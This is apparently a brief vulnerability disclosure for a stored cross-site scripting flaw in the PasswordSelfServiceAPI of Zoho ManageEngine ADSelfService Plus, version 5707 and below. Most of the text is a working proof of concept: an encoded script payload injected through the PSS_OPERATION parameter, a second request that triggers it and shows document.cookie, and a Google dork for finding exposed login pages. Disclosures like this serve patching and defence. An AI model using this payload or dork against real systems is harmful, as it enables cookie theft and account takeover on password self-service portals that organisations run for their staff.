RestAPI/PasswordSelfServiceAPI in Zoho ManageEngine ADSelfService Plus version 5707 and below allows remote attackers to inject arbitrary web
script or HTML via the PSS_OPERATION parameter.
Example Proof of Concept:
Store XSS Payload:
https://example.com/RestAPI/PasswordSelfServiceAPI?operation=verifyUser&PRODUCT_NAME=ADSSP&PSS_OPERATION=%22%7D%3B%3Chtml%3E%3CIMG%20SRC=/%20onerror=alert(document.cookie)%3E%3C/img%3E
Payload Execution:
https://example.com/RestAPI/PasswordSelfServiceAPI?operation=passwordSelfService&PRODUCT_NAME=ADSSP
Google Dork:
inurl:”showlogin.cc”